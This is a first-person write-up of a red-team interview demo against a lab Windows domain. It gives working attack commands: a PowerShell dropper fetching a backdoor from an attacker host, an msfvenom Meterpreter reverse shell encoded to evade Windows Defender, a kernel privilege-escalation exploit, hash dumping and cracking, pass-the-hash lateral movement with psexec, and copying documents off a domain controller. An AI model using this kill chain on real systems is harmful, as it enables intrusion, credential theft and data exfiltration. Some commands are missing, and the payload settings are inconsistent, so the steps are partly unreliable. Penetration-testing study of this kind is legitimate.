Writeup of a cybersecurity interview
Some weeks ago I was contacted via LinkedIn by a very interesting startup that was looking for a sales engineer for Italian market. After a couple of phone interviews, they asked me to prepare a demo. The idea of the demo was to recreate a corporate environment, simulate an attack to a client and perform a data exfiltration from domain controller.
Anyway, due the limited time (3/4 days) I used the first techniques that I found working. With more time I should have done a better job, developing a more complex and stealth attack or writing a custom exploit.
These are the constraints for the exercise:
- the 2 endpoints should be windows 10/7;
- each end point will have personal firewall on with restriction for outbound communication http/https/dns;
- each endpoint will include windows defender turn on with default settings;
- all communication from the vm (organization) network to the internet will be filtered except http/s;
- DC server in different segment (2012 and above);
- DC will have personal firewall on with restriction for common AD services only;
- DC cannot access to internet;
- DC will include sensitive doc file;
I then start preparing a working environment. I used a notebook running KVM for virtualizing the target network and another latptop with a Kali VM for the attack machine. The two physical machine was connected by a ethernet cable.
Due to limited time, I decided to use a routing and firewalling platform that I know very well and that I can setup and configure in a very short time. Then I decided to use a KVM VM running a demo version of Mikrotik RouterOS (even if I made some interesting tests with Vyos).
Let’s move to the interesting part then.
My strategy to approach the PoC was organized in these different steps:
- Initial foothold
- Lateral movement
- Domain Controller attack
- Data Exfiltration
- Housekeeping (optional)
Phase 1: Initial Foothold
In order to simulate an attack, I just want that it should be the more realistic as possible, then I collected some interesting statistics aboout cybersecurity threats and attack:
- Social engineering is used in 97% of modern attacks
- More than 75% of malware is delivered via email attachments
- Most common disguise is fake invoice
Then, I decided to attack the client with the following strategy using a two way dropper:
- The first stage dropper is a Powershell script that will be embedded inside a fake invoice
- I will distribute the dropper to the target via email, simulating spear phising attack (this parts was considered out of scope)
- Once executed, the dropper will download an exe files containing the reverse shell (second stage)
Let’s analyze more in details the preparation of the first stage malware:
In the attacker workstation, we will launch a simple web server using a Python one-liner, listening on port 53 (in order to pass over a permitted port):
python -m SimpleHTTPServer 53
In the target workstation (executed through a social engineer attack, out of the scope of the demo) we will launch a powershell script that connect to the attacker workstation, download the backdoor and execute it
Start-BitsTransfer -Source http://$ATTACKER_IP:53/backdoor.exe -Destination backdoor.exe
The second stage malware embeds a reverse Meterpreter HTTPS shell using windows/meterpreter/reverse_https
In order to bypass the antivirus (Microsoft Windows Defender updated to last version) the payload will be encoded using msfvenom, in order to evade with shikata_ga_nai encoder
msfvenom -a x86 — platform windows -p windows/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe-only -o $MALWARE_PATH/backdoor.exe
The shell will be configured to connect to IP of attacker where an handler is listening. I will use HTTPS as transport protocol in order to bypass firewall rules and not be inspected (no SSL inspection in the assignment).
set payload windows/meterpreter_reverse_tcp
set LHOST $ATTACKER_IP
set LPORT 443
When the exe is launched by the stage one, the connection to the attacker will start; after acquiring the shell, I will migrate to explorer.exe or other less suspicious processes in order to leave less evidence.
Right now we have a persistent backdoor as a reverse shell in the first client, but we don’t have any administrative rights for executing privileged tasks and activities, then we should escalate the privileges.
For finding local exploit we can use a very handy module native in Metasploit post/multi/recon/local_exploit_suggester. In my case, this was very useful, because time constraint was very tight and I don’t have so much time to manually test different exploits. This module suggested to use the exploit: ms15_051_client_copy_image. This module exploits improper object handling in the win32k.sys kernel mode driver.
set session 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ATTACKER_IP
set LPORT 443
Using it, we can have a local administrator shell that can be migrated with the migrate command in order to be less suspicious (this is made through DLL injection) and then become persistent.
migrate -N svchost.exe
Phase 2: Lateral movement
After obtaining a privileged shell, we can move around in the network to compromise another client. Suppose that we already know the address of the other client (in a real scenario, we need to find it via a time consuming information gathering process), we can try to use a pass-the-hash attack in order to access to another PC. This attack uses the NTLM hashes cached locally (i.e. after an administrator login on the client) for authenticate in other clients even if we don’t know the passwords.
These hashes are stored Security Account Manager (SAM) database and we can inspect it with the meterpreter command hashdump:
This is the format of the output:
Username:RelativeIdentification(RID):LM Hash:NTLM Hash::
Let’s try to extract the stored domain hashes that have been cached as a result of a GPO setting or after an Administrator login, using the meterpreter command cachedump
If we get something, we can try to crack them with john, in order to get credentials
john — format=mscash2 hashs2.txt
After few minutes, this is the result:
john — show — format=mscash2 hashs2.txt
2 password hashes cracked, 0 left
If this process works fine (like in my case) we have password and hashes to move around using psexec. The meterpreter module psexec try to upload and execute a reverse shell in a SMB share using the command psexec.
set SMBPass Passw0rd
set SMBUser Administrator
set SMBDomain ATTACK.LAN
set LHOST $WKS2_IP
After got a shell, we can escalate privileges and upload the dropper in order to have a new reverse shell to the handler in the attack workstation.
Phase 3: Domain controller attack
Let’s try to attack DC. We can get the address of DC with the command:
DC has no access to internet and very restrictive firewall policies (only AD services), but let’s try if I can avoid connection pivoting through one of the clients, due to my limited time. Keep It Simple!
I already know the domain administrator password and hashes, then I may use psexec from client1 for executing commands on DC or mounting the DC’s C$ share on client1 and then access all datas.
net use s: \\DC\C$ /user:Administrator
It works! I now have a not interactive shell and access to the whole DC filesystem. This is enough for the scope of the demo.
Phase 4: Data Exfiltration
Let’s look for doc files:
search -f *.doc
When found, let’s download in the attacker console:
Phase 5: Housekeeping (optional)
Once the file is exfiltrated, we clean up everything with the command:
Even if the company disappear after other not technical interview, this PoC was a great way to learn better penetration testing and red team techniques in a AD directory attack.
Feel free to contact me if you are interested in more details or if you want to discuss other techniques (I am pretty sure that there are many smarter, cleaner and quicker way to solve the problem).